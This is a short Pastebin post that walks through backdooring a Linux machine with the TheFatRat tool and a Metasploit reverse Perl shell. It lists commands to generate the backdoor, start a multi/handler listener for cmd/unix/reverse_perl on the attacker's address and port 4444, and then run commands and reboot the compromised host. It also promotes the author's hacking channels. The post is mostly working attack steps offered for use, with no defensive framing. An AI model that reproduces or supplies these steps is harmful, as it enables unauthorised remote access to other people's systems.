Professional-hacker

hacking linux with perl payload using TheFatRat

Jan 13th, 2017
272
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. ##################################################JokerSecurity###############################################################
  2. # Title : hacking linux with perl payload using TheFatRat
  3. # Tested On : [ Kali-Linux ]
  4. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  5. # Myblog : http://kader-information.blogspot.com/
  6. # Link Video :https://www.youtube.com/watch?v=uaviSnfxgPM&feature=youtu.be
  7. ######################
  8. # [+] COMMENDS :
  9. ######################
  10. create Backdoor :
  11. ================
  12. cd TheFatRat
  13. ./fatrat
  14.  
  15. metasploit commends
  16. ================
  17. msfconsole
  18. use exploit/multi/handler
  19. set payload cmd/unix/reverse_perl
  20. set lhost (your-ip)
  21. set lport 4444
  22. exploit
  23. ls
  24. ifconfig
  25. reboot
  26.  
  27.  
  28.  
  29.  
  30. subscribe for my channel and page in facebook
  31.  
  32. # My Blogger : http://kader-information.blogspot.com/
  33.  
  34. # Page FacebOOk 1: https://www.facebook.com/AnonymousPalestine.vip
  35.  
  36. # Page Facebook 2 : https://www.facebook.com/Professional.hacker.25
  37.  
  38. By <3
  39.  
  40. ##################################################JokerSecurity###############################################################
Add Comment
Please, Sign In to add comment